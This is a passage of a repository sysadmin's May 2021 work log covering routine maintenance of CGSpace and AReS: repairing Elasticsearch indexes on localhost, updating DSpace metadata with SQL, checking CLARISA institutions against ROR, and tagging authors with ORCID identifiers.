+<ul>
+<li>I even tried unmapping it from all collections, and adding it to a single new owning collection&hellip;</li>
+</ul>
+</li>
+<li>Ah hah! Actually, I was inspecting the item&rsquo;s authorization policies when I noticed that someone had made the item private!
+<ul>
+<li>After making it public again I was able to see it in the target collection</li>
+</ul>
+</li>
+<li>The indexes on AReS Explorer are messed up after last week&rsquo;s harvesting:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s http://localhost:9200/_cat/indices | grep openrxv-items
+</span></span><span style="display:flex;"><span>yellow open openrxv-items-temp       H-CGsyyLTaqAj6-nKXZ-7w 1 1 104165 105024 487.7mb 487.7mb
+</span></span><span style="display:flex;"><span>yellow open openrxv-items-final      d0tbMM_SRWimirxr_gm9YA 1 1    937      0   2.2mb   2.2mb
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/_alias/&#39;</span> | python -m json.tool
+</span></span><span style="display:flex;"><span>...
+</span></span><span style="display:flex;"><span>    &#34;openrxv-items-final&#34;: {
+</span></span><span style="display:flex;"><span>        &#34;aliases&#34;: {}
+</span></span><span style="display:flex;"><span>    },
+</span></span><span style="display:flex;"><span>    &#34;openrxv-items-temp&#34;: {
+</span></span><span style="display:flex;"><span>        &#34;aliases&#34;: {
+</span></span><span style="display:flex;"><span>            &#34;openrxv-items&#34;: {}
+</span></span><span style="display:flex;"><span>        }
+</span></span><span style="display:flex;"><span>    }
+</span></span></code></pre></div><ul>
+<li><code>openrxv-items</code> should be an alias of <code>openrxv-items-final</code>&hellip;</li>
+<li>I made a backup of the temp index and then started indexing on the AReS Explorer admin dashboard:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
+</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items-temp-backup
+</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: false}}&#39;</span>
+</span></span></code></pre></div><h2 id="2021-05-10">2021-05-10</h2>
+<ul>
+<li>Amazing, the harvesting on AReS finished but it messed up all the indexes and now there are no items in any index!</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s http://localhost:9200/_cat/indices | grep openrxv-items
+</span></span><span style="display:flex;"><span>yellow open openrxv-items-temp        8thRX0WVRUeAzmd2hkG6TA 1 1      0     0    283b    283b
+</span></span><span style="display:flex;"><span>yellow open openrxv-items-temp-backup _0tyvctBTg2pjOlcoVP1LA 1 1 104165 20134 305.5mb 305.5mb
+</span></span><span style="display:flex;"><span>yellow open openrxv-items-final       BtvV9kwVQ3yBYCZvJS1QyQ 1 1      0     0    283b    283b
+</span></span></code></pre></div><ul>
+<li>I fixed the indexes manually by re-creating them and cloning from the backup:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-final&#39;</span>
+</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp-backup/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
+</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items-temp-backup/_clone/openrxv-items-final
+</span></span><span style="display:flex;"><span>$ curl -s -X POST <span style="color:#e6db74">&#39;http://localhost:9200/_aliases&#39;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;actions&#34; : [{&#34;add&#34; : { &#34;index&#34; : &#34;openrxv-items-final&#34;, &#34;alias&#34; : &#34;openrxv-items&#34;}}]}&#39;</span>
+</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp-backup&#39;</span>
+</span></span></code></pre></div><ul>
+<li>Also I ran all updated on the server and updated all Docker images, then rebooted the server (linode20):</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ docker images | grep -v ^REPO | sed <span style="color:#e6db74">&#39;s/ \+/:/g&#39;</span> | cut -d: -f1,2 | xargs -L1 docker pull
+</span></span></code></pre></div><ul>
+<li>I backed up the AReS Elasticsearch data using elasticdump, then started a new harvest:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ elasticdump --input<span style="color:#f92672">=</span>http://localhost:9200/openrxv-items --output<span style="color:#f92672">=</span>/home/aorth/openrxv-items_mapping.json --type<span style="color:#f92672">=</span>mapping
+</span></span><span style="display:flex;"><span>$ elasticdump --input<span style="color:#f92672">=</span>http://localhost:9200/openrxv-items --output<span style="color:#f92672">=</span>/home/aorth/openrxv-items_data.json --type<span style="color:#f92672">=</span>data --limit<span style="color:#f92672">=</span><span style="color:#ae81ff">1000</span>
+</span></span></code></pre></div><ul>
+<li>Discuss CGSpace statistics with the CIP team
+<ul>
+<li>They were wondering why their numbers for 2020 were so low</li>
+<li>I checked their community using the DSpace Statistics API and found very accurate numbers for 2020 and 2019 for them</li>
+<li>I think they had been using AReS, which actually doesn&rsquo;t even give stats for a time period&hellip;</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-05-11">2021-05-11</h2>
+<ul>
+<li>The AReS harvesting from yesterday finished, but the indexes are messed up again so I will have to fix them again before I harvest next time</li>
+<li>I also spent some time looking at IWMI&rsquo;s reports again
+<ul>
+<li>On AReS we don&rsquo;t have a way to group by peer reviewed or item type other than doing &ldquo;if type is Journal Article&rdquo;</li>
+<li>Also, we don&rsquo;t have a way to check the IWMI Strategic Priorities because those are communities, not metadata&hellip;</li>
+<li>We can get the collections an item is in from the <code>parentCollectionList</code> metadata, but it is saved in Elasticsearch as a string instead of a list&hellip;</li>
+<li>I told them it won&rsquo;t be possible to replicate their reports exactly</li>
+</ul>
+</li>
+<li>I decided to look at the CLARISA controlled vocabularies again
+<ul>
+<li>They now have 6,200 institutions (was around 3,400 when I last looked in 2020-07)</li>
+<li>They have updated their Swagger interface but it still requires an API key if you want to use it from curl</li>
+<li>They have ISO 3166 countries and UN M.49 regions, but I notice they have some weird names like &ldquo;Russian Federation (the)&rdquo;, which is not in ISO 3166 as far as I can see</li>
+<li>I exported a list of the institutions to look closer
+<ul>
+<li>I found twelve items with whitespace issues</li>
+<li>There are some weird entries like <code>Research Institute for Aquaculture No1</code> and <code>Research Institute for Aquaculture No2</code></li>
+<li>A few items have weird Unicode characters like U+00AD, U+200B, and U+00A0</li>
+<li>I found 100+ items with multiple languages in there name like <code>Ministère de l’Agriculture, de la pêche et des ressources hydrauliques / Ministry of Agriculture, Hydraulic Resources and Fisheries</code></li>
+<li>Over 600 institutions have the country in their name like <code>Ministry of Coordination of Environmental Affairs (Mozambique)</code></li>
+<li>For URLs they have <code>null</code> in some places&hellip; which is weird&hellip; why not just leave it blank?</li>
+</ul>
+</li>
+</ul>
+</li>
+<li>I checked the CLARISA list against ROR&rsquo;s April, 2020 release (&ldquo;Version 9&rdquo;, on figshare, though it is version 8 in the dump):</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/ror-lookup.py -i /tmp/clarisa-institutions.txt -r ror-data-2021-04-06.json -o /tmp/clarisa-ror-matches.csv
+</span></span><span style="display:flex;"><span>$ csvgrep -c matched -m <span style="color:#e6db74">&#39;true&#39;</span> /tmp/clarisa-ror-matches.csv | sed <span style="color:#e6db74">&#39;1d&#39;</span> | wc -l
+</span></span><span style="display:flex;"><span>1770
+</span></span></code></pre></div><ul>
+<li>With 1770 out of 6230 matched, that&rsquo;s 28.5%&hellip;</li>
+<li>I sent an email to Hector Tobon to point out the issues in CLARISA again and ask him to chat</li>
+<li>Meeting with GARDIAN developers about CG Core and how GARDIAN works</li>
+</ul>
+<h2 id="2021-05-13">2021-05-13</h2>
+<ul>
+<li>Fix a few thousand IWMI URLs that are using HTTP instead of HTTPS on CGSpace:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, &#39;http://www.iwmi.cgiar.org&#39;,&#39;https://www.iwmi.cgiar.org&#39;, &#39;g&#39;) WHERE text_value LIKE &#39;http://www.iwmi.cgiar.org%&#39; AND metadata_field_id=219;
+</span></span><span style="display:flex;"><span>UPDATE 1132
+</span></span><span style="display:flex;"><span>localhost/dspace63= &gt; UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, &#39;http://publications.iwmi.org&#39;,&#39;https://publications.iwmi.org&#39;, &#39;g&#39;) WHERE text_value LIKE &#39;http://publications.iwmi.org%&#39; AND metadata_field_id=219;
+</span></span><span style="display:flex;"><span>UPDATE 1803
+</span></span></code></pre></div><ul>
+<li>In the case of the latter, the HTTP links don&rsquo;t even work! The web server returns HTTP 404 unless the request is HTTPS</li>
+<li>IWMI also says that their subjects are a subset of AGROVOC so they no longer want to use <code>cg.subject.iwmi</code> for their subjects
+<ul>
+<li>They asked if I can move them to <code>dcterms.subject</code></li>
+</ul>
+</li>
+<li>Delete two items for Udana because he was getting the &ldquo;Authorization denied for action OBSOLETE (DELETE) &hellip;&rdquo; error when trying to delete them (DSpace 6 bug I found a few months ago)
+<ul>
+<li><a href="https://cgspace.cgiar.org/handle/10568/34536">https://cgspace.cgiar.org/handle/10568/34536</a></li>
+<li><a href="https://cgspace.cgiar.org/handle/10568/34570">https://cgspace.cgiar.org/handle/10568/34570</a></li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-05-14">2021-05-14</h2>
+<ul>
+<li>I updated the PostgreSQL JDBC driver in the Ansible playbooks to version 42.2.20 and deployed it on DSpace Test (linode26)</li>
+</ul>
+<h2 id="2021-05-15">2021-05-15</h2>
+<ul>
+<li>I have to fix the Elasticsearch indexes on AReS after last week&rsquo;s harvesting because, as always, the <code>openrxv-items</code> index should be an alias of <code>openrxv-items-final</code> instead of <code>openrxv-items-temp</code>:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/_alias/&#39;</span> | python -m json.tool
+</span></span><span style="display:flex;"><span>    &#34;openrxv-items-final&#34;: {
+</span></span><span style="display:flex;"><span>        &#34;aliases&#34;: {}
+</span></span><span style="display:flex;"><span>    },
+</span></span><span style="display:flex;"><span>    &#34;openrxv-items-temp&#34;: {
+</span></span><span style="display:flex;"><span>        &#34;aliases&#34;: {
+</span></span><span style="display:flex;"><span>            &#34;openrxv-items&#34;: {}
+</span></span><span style="display:flex;"><span>        }
+</span></span><span style="display:flex;"><span>    },
+</span></span><span style="display:flex;"><span>...
+</span></span></code></pre></div><ul>
+<li>I took a backup of the <code>openrxv-items</code> index with elasticdump so I can re-create them manually before starting a new harvest tomorrow:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ elasticdump --input<span style="color:#f92672">=</span>http://localhost:9200/openrxv-items --output<span style="color:#f92672">=</span>/home/aorth/openrxv-items_mapping.json --type<span style="color:#f92672">=</span>mapping
+</span></span><span style="display:flex;"><span>$ elasticdump --input<span style="color:#f92672">=</span>http://localhost:9200/openrxv-items --output<span style="color:#f92672">=</span>/home/aorth/openrxv-items_data.json --type<span style="color:#f92672">=</span>data --limit<span style="color:#f92672">=</span><span style="color:#ae81ff">1000</span>
+</span></span></code></pre></div><h2 id="2021-05-16">2021-05-16</h2>
+<ul>
+<li>I deleted and re-created the Elasticsearch indexes on AReS:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-final&#39;</span>
+</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
+</span></span><span style="display:flex;"><span>$ curl -XPUT <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-final&#39;</span>
+</span></span><span style="display:flex;"><span>$ curl -XPUT <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
+</span></span><span style="display:flex;"><span>$ curl -s -X POST <span style="color:#e6db74">&#39;http://localhost:9200/_aliases&#39;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;actions&#34; : [{&#34;add&#34; : { &#34;index&#34; : &#34;openrxv-items-final&#34;, &#34;alias&#34; : &#34;openrxv-items&#34;}}]}&#39;</span>
+</span></span></code></pre></div><ul>
+<li>Then I re-imported the backup that I created with elasticdump yesterday:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ elasticdump --input<span style="color:#f92672">=</span>/home/aorth/openrxv-items_mapping.json --output<span style="color:#f92672">=</span>http://localhost:9200/openrxv-items-final --type<span style="color:#f92672">=</span>mapping
+</span></span><span style="display:flex;"><span>$ elasticdump --input<span style="color:#f92672">=</span>/home/aorth/openrxv-items_data.json --output<span style="color:#f92672">=</span>http://localhost:9200/openrxv-items-final --type<span style="color:#f92672">=</span>data --limit<span style="color:#f92672">=</span><span style="color:#ae81ff">1000</span> 
+</span></span></code></pre></div><ul>
+<li>Then I started a new harvest on AReS</li>
+</ul>
+<h2 id="2021-05-17">2021-05-17</h2>
+<ul>
+<li>The AReS harvest finished and the Elasticsearch indexes seem OK so I shouldn&rsquo;t have to fix them next time&hellip;</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s http://localhost:9200/_cat/indices | grep openrxv-items
+</span></span><span style="display:flex;"><span>yellow open openrxv-items-temp       o3ijJLcyTtGMOPeWpAJiVA 1 1      0 0    283b    283b
+</span></span><span style="display:flex;"><span>yellow open openrxv-items-final      TrJ1Ict3QZ-vFkj-4VcAzw 1 1 104317 0 259.4mb 259.4mb
+</span></span><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/_alias/&#39;</span> | python -m json.tool
+</span></span><span style="display:flex;"><span>    &#34;openrxv-items-temp&#34;: {
+</span></span><span style="display:flex;"><span>        &#34;aliases&#34;: {}
+</span></span><span style="display:flex;"><span>    },
+</span></span><span style="display:flex;"><span>    &#34;openrxv-items-final&#34;: {
+</span></span><span style="display:flex;"><span>        &#34;aliases&#34;: {
+</span></span><span style="display:flex;"><span>            &#34;openrxv-items&#34;: {}
+</span></span><span style="display:flex;"><span>        }
+</span></span><span style="display:flex;"><span>    },
+</span></span><span style="display:flex;"><span>...
+</span></span></code></pre></div><ul>
+<li>Abenet said she and some others can&rsquo;t log into CGSpace
+<ul>
+<li>I tried to check the CGSpace LDAP account and it does seem to be not working:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ldapsearch -x -H ldaps://AZCGNEROOT2.CGIARAD.ORG:636/ -b <span style="color:#e6db74">&#34;dc=cgiarad,dc=org&#34;</span> -D <span style="color:#e6db74">&#34;cgspace-ldap@cgiarad.org&#34;</span> -W <span style="color:#e6db74">&#34;(sAMAccountName=aorth)&#34;</span>
+</span></span><span style="display:flex;"><span>Enter LDAP Password: 
+</span></span><span style="display:flex;"><span>ldap_bind: Invalid credentials (49)
+</span></span><span style="display:flex;"><span>        additional info: 80090308: LdapErr: DSID-0C090453, comment: AcceptSecurityContext error, data 532, v3839
+</span></span></code></pre></div><ul>
+<li>I sent a message to Biruk so he can check the LDAP account</li>
+<li>IWMI confirmed that they do indeed want to move all their subjects to AGROVOC, so I made the changes in the XMLUI and config (<a href="https://github.com/ilri/DSpace/pull/467">#467</a>)
+<ul>
+<li>Then I used the <code>migrate-fields.sh</code> script to move them (46,000 metadata entries!)</li>
+</ul>
+</li>
+<li>I tested Abdullah&rsquo;s latest pull request to add clickable filters to AReS and I think it works
+<ul>
+<li>I had some issues with my local AReS installation so I was only able to do limited testing&hellip;</li>
+<li>I will have to wait until I have more time to test before I can merge that</li>
+</ul>
+</li>
+<li>CCAFS asked me to add eight more phase II project tags to the CGSpace input form
+<ul>
+<li>I extracted the existing ones using xmllint, added the new ones, sorted them, and then replaced them in <code>input-forms.xml</code>:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ xmllint --xpath <span style="color:#e6db74">&#39;//value-pairs[@value-pairs-name=&#34;ccafsprojectpii&#34;]/pair/stored-value/node()&#39;</span> dspace/config/input-forms.xml
+</span></span></code></pre></div><ul>
+<li>I formatted the input file with tidy, especially because one of the new project tags has an ampersand character&hellip; grrr:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ tidy -xml -utf8 -m -iq -w <span style="color:#ae81ff">0</span> dspace/config/input-forms.xml      
+</span></span><span style="display:flex;"><span>line 3658 column 26 - Warning: unescaped &amp; or unknown entity &#34;&amp;WA_EU-IFAD&#34;
+</span></span><span style="display:flex;"><span>line 3659 column 23 - Warning: unescaped &amp; or unknown entity &#34;&amp;WA_EU-IFAD&#34;
+</span></span></code></pre></div><ul>
+<li>After testing whether this escaped value worked during submission, I created and merged a pull request to <code>6_x-prod</code> (<a href="https://github.com/ilri/DSpace/pull/468">#468</a>)</li>
+</ul>
+<h2 id="2021-05-18">2021-05-18</h2>
+<ul>
+<li>Paola from the Alliance emailed me some new ORCID identifiers to add to CGSpace</li>
+<li>I saved the new ones to a text file, combined them with the others, extracted the ORCID iDs themselves, and updated the names using <code>resolve-orcids.py</code>:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-identifier.xml /tmp/new | grep -oE <span style="color:#e6db74">&#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39;</span> | sort | uniq &gt; /tmp/2021-05-18-combined.txt
+</span></span><span style="display:flex;"><span>$ ./ilri/resolve-orcids.py -i /tmp/2021-05-18-combined.txt -o /tmp/2021-05-18-combined-names.txt
+</span></span></code></pre></div><ul>
+<li>I sorted the names and added the XML formatting in vim, then ran it through tidy:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ tidy -xml -utf8 -m -iq -w <span style="color:#ae81ff">0</span> dspace/config/controlled-vocabularies/cg-creator-identifier.xml
+</span></span></code></pre></div><ul>
+<li>Tag fifty-five items from the Alliance&rsquo;s new authors with ORCID iDs using <code>add-orcid-identifiers-csv.py</code>:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat 2021-05-18-add-orcids.csv 
+</span></span><span style="display:flex;"><span>dc.contributor.author,cg.creator.identifier
+</span></span><span style="display:flex;"><span>&#34;Urioste Daza, Sergio&#34;,Sergio Alejandro Urioste Daza: 0000-0002-3208-032X
+</span></span><span style="display:flex;"><span>&#34;Urioste, Sergio&#34;,Sergio Alejandro Urioste Daza: 0000-0002-3208-032X
+</span></span><span style="display:flex;"><span>&#34;Villegas, Daniel&#34;,Daniel M. Villegas: 0000-0001-6801-3332
+</span></span><span style="display:flex;"><span>&#34;Villegas, Daniel M.&#34;,Daniel M. Villegas: 0000-0001-6801-3332
+</span></span><span style="display:flex;"><span>&#34;Giles, James&#34;,James Giles: 0000-0003-1899-9206
+</span></span><span style="display:flex;"><span>&#34;Simbare,  Alice&#34;,Alice Simbare: 0000-0003-2389-0969
+</span></span><span style="display:flex;"><span>&#34;Simbare, Alice&#34;,Alice Simbare: 0000-0003-2389-0969
+</span></span><span style="display:flex;"><span>&#34;Simbare, A.&#34;,Alice Simbare: 0000-0003-2389-0969
+</span></span><span style="display:flex;"><span>&#34;Dita Rodriguez, Miguel&#34;,Miguel Angel Dita Rodriguez: 0000-0002-0496-4267
+</span></span><span style="display:flex;"><span>&#34;Templer, Noel&#34;,Noel Templer: 0000-0002-3201-9043
+</span></span><span style="display:flex;"><span>&#34;Jalonen, R.&#34;,Riina Jalonen: 0000-0003-1669-9138
+</span></span><span style="display:flex;"><span>&#34;Jalonen, Riina&#34;,Riina Jalonen: 0000-0003-1669-9138
+</span></span><span style="display:flex;"><span>&#34;Izquierdo, Paulo&#34;,Paulo Izquierdo: 0000-0002-2153-0655
+</span></span><span style="display:flex;"><span>&#34;Reyes, Byron&#34;,Byron Reyes: 0000-0003-2672-9636
+</span></span><span style="display:flex;"><span>&#34;Reyes, Byron A.&#34;,Byron Reyes: 0000-0003-2672-9636
+</span></span><span style="display:flex;"><span>$ ./ilri/add-orcid-identifiers-csv.py -i /tmp/2021-05-18-add-orcids.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -d
+</span></span></code></pre></div><ul>
+<li>I deployed the latest <code>6_x-prod</code> branch on CGSpace, ran all system updates, and rebooted the server
+<ul>
+<li>This included the IWMI changes, so I also migrated the <code>cg.subject.iwmi</code> metadata to <code>dcterms.subject</code> and deleted the subject term</li>
+<li>Then I started a full Discovery reindex</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-05-19">2021-05-19</h2>
+<ul>
+<li>I realized that I need to lower case the IWMI subjects that I just moved to AGROVOC because they were probably mostly uppercase
+<ul>
+<li>To my surprise I checked <code>dcterms.subject</code> has 47,000 metadata fields that are upper or mixed case!</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>dspace=# UPDATE metadatavalue SET text_value=LOWER(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=187 AND text_value ~ &#39;[[:upper:]]&#39;;
+</span></span><span style="display:flex;"><span>UPDATE 47405
+</span></span></code></pre></div><ul>
+<li>That&rsquo;s interesting because we lowercased them all a few months ago, so these must all be new&hellip; wow
+<ul>
+<li>We have 405,000 total AGROVOC terms, with 20,600 of them being unique</li>
+<li>I will have to start another Discovery re-indexing to pick up these new changes</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-05-20">2021-05-20</h2>
+<ul>
+<li>Export the top 5,000 AGROVOC terms to validate them:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id = 187 GROUP BY text_value ORDER BY count DESC LIMIT 5000) to /tmp/2021-05-20-agrovoc.csv WITH CSV HEADER;
+</span></span><span style="display:flex;"><span>COPY 5000
+</span></span><span style="display:flex;"><span>$ csvcut -c <span style="color:#ae81ff">1</span> /tmp/2021-05-20-agrovoc.csv| sed 1d &gt; /tmp/2021-05-20-agrovoc.txt
+</span></span><span style="display:flex;"><span>$ ./ilri/agrovoc-lookup.py -i /tmp/2021-05-20-agrovoc.txt -o /tmp/2021-05-20-agrovoc-results.csv
+</span></span><span style="display:flex;"><span>$ csvgrep -c <span style="color:#e6db74">&#34;number of matches&#34;</span> -r <span style="color:#e6db74">&#39;^0$&#39;</span> /tmp/2021-05-20-agrovoc-results.csv &gt; /tmp/2021-05-20-agrovoc-rejected.csv
+</span></span></code></pre></div><ul>
+<li>Meeting with Medha and Pythagoras about the FAIR Workflow tool
+<ul>
+<li>Discussed the need for such a tool, other tools being developed, etc</li>
+<li>I stressed the important of controlled vocabularies</li>
+<li>No real outcome, except to keep us posted and let us know if they need help testing on DSpace</li>
+</ul>
+</li>
+<li>Meeting with Hector Tobon to discuss issues with CLARISA
+<ul>
+<li>They pushed back a bit, saying they were more focused on the needs of the CG</li>
+<li>They are not against the idea of aligning closer to ROR, but lack the man power</li>
+<li>They pointed out that their countries come directly from the <a href="https://www.iso.org/iso-3166-country-codes.html">ISO 3166 online browsing platform on the ISO website</a></li>
+<li>Indeed the text value for Russia is &ldquo;Russian Federation (the)&rdquo; there&hellip; I find that strange</li>
+<li>I filed <a href="https://salsa.debian.org/iso-codes-team/iso-codes/-/issues/33">an issue</a> on the iso-codes GitLab repository</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-05-24">2021-05-24</h2>
+<ul>
+<li>Add ORCID identifiers for missing ILRI authors and tag 550 others based on a few authors I noticed that were missing them:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat 2021-05-24-add-orcids.csv 
+</span></span><span style="display:flex;"><span>dc.contributor.author,cg.creator.identifier
+</span></span><span style="display:flex;"><span>&#34;Patel, Ekta&#34;,&#34;Ekta Patel: 0000-0001-9400-6988&#34;
+</span></span><span style="display:flex;"><span>&#34;Dessie, Tadelle&#34;,&#34;Tadelle Dessie: 0000-0002-1630-0417&#34;
+</span></span><span style="display:flex;"><span>&#34;Tadelle, D.&#34;,&#34;Tadelle Dessie: 0000-0002-1630-0417&#34;
+</span></span><span style="display:flex;"><span>&#34;Dione, Michel M.&#34;,&#34;Michel Dione: 0000-0001-7812-5776&#34;
+</span></span><span style="display:flex;"><span>&#34;Kiara, Henry K.&#34;,&#34;Henry Kiara: 0000-0001-9578-1636&#34;
+</span></span><span style="display:flex;"><span>&#34;Naessens, Jan&#34;,&#34;Jan Naessens: 0000-0002-7075-9915&#34;
+</span></span><span style="display:flex;"><span>&#34;Steinaa, Lucilla&#34;,&#34;Lucilla Steinaa: 0000-0003-3691-3971&#34;
+</span></span><span style="display:flex;"><span>&#34;Wieland, Barbara&#34;,&#34;Barbara Wieland: 0000-0003-4020-9186&#34;
+</span></span><span style="display:flex;"><span>&#34;Grace, Delia&#34;,&#34;Delia Grace: 0000-0002-0195-9489&#34;
+</span></span><span style="display:flex;"><span>&#34;Rao, Idupulapati M.&#34;,&#34;Idupulapati M. Rao: 0000-0002-8381-9358&#34;
+</span></span><span style="display:flex;"><span>&#34;Cardoso Arango, Juan Andrés&#34;,&#34;Juan Andrés Cardoso Arango: 0000-0002-0252-4655&#34;
+</span></span><span style="display:flex;"><span>$ ./ilri/add-orcid-identifiers-csv.py -i 2021-05-24-add-orcids.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span>
+</span></span></code></pre></div><ul>
+<li>A few days ago I took a backup of the Elasticsearch indexes on AReS using elasticdump:</li>
+</ul>
